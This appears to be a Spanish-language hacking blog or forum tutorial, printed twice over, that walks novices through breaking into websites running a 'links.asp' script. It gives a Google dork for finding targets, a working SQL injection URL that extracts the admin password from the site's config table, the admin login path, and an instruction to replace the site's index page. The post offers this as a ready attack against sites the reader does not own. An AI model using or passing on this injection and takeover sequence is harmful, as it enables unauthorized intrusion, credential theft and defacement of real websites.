Bueno ando con animos de enseñar asi oy les enseñare como obtener password de webs .asp (weblinks).
Bien primero vamos a san google
Y ponemos este dork: allinurl:links.asp?action=whatsnew
Nos tiene que quedar como la siguiente la siguiente imagen:
Bien despues hacemos click en el boton buscar y nos apareceran resultados como los que ven en esta imagen:
Pero primero antes de continuar les enseñare cuando es que una web no es vulnerable.
Una web no es vulnerable cuando aparece una error como el de la siguiente imagen:
Bien continuemos Cuando ya aigan elejido su web tienen q ponerle la siguiente inyeccion:
links.asp?action=reporterror&linkID=221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
Tiene que quedarles por ejemplo si la web es:
http://www.victima.com/reviews/links...ction=whatsnew
Tienen que borrar links.asp?action=whatsnew a modo que les quede asi:
http://www.victima.com/reviews/links...221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
Bien despues que aigan echo la inyeccion tuvo que aberles dado la password asi como ven en la siguiente imagen:
Como pueden ver a la par de "link title" aparece una palabra entonces esa palabra es la contraseña del admin.
Bien ahora tenemos que loguearnos.
Para eso volvemos a borrar links.asp para alla y agregamos lo siguiente:
links.asp?action=admin
De ahi en la pagina que nos salga escribimos la contraseña que sacamos con la inyeccion.
Entonces nos tendria que quedar asi:
Damos click al boton login y nos saldra un panel de administracion como el de esta imagen:
Y listo lo unico que tendran que acer sera añadir el codigo de su index.
Saludos espero les aya servido y sea de ayuda para los noobs igual que yo xD ;D ;D
Comenten o ya no les vuelvo a hacer otro tutorial jaja xD son bromas
Bien primero vamos a san google
Y ponemos este dork: allinurl:links.asp?action=whatsnew
Nos tiene que quedar como la siguiente la siguiente imagen:
Bien despues hacemos click en el boton buscar y nos apareceran resultados como los que ven en esta imagen:
Pero primero antes de continuar les enseñare cuando es que una web no es vulnerable.
Una web no es vulnerable cuando aparece una error como el de la siguiente imagen:
Bien continuemos Cuando ya aigan elejido su web tienen q ponerle la siguiente inyeccion:
links.asp?action=reporterror&linkID=221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
Tiene que quedarles por ejemplo si la web es:
http://www.victima.com/reviews/links...ction=whatsnew
Tienen que borrar links.asp?action=whatsnew a modo que les quede asi:
http://www.victima.com/reviews/links...221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
Bien despues que aigan echo la inyeccion tuvo que aberles dado la password asi como ven en la siguiente imagen:
Como pueden ver a la par de "link title" aparece una palabra entonces esa palabra es la contraseña del admin.
Bien ahora tenemos que loguearnos.
Para eso volvemos a borrar links.asp para alla y agregamos lo siguiente:
links.asp?action=admin
De ahi en la pagina que nos salga escribimos la contraseña que sacamos con la inyeccion.
Entonces nos tendria que quedar asi:
Damos click al boton login y nos saldra un panel de administracion como el de esta imagen:
Y listo lo unico que tendran que acer sera añadir el codigo de su index.
Saludos espero les aya servido y sea de ayuda para los noobs igual que yo xD ;D ;D
Comenten o ya no les vuelvo a hacer otro tutorial jaja xD son bromas
0 comentarios:
Publicar un comentario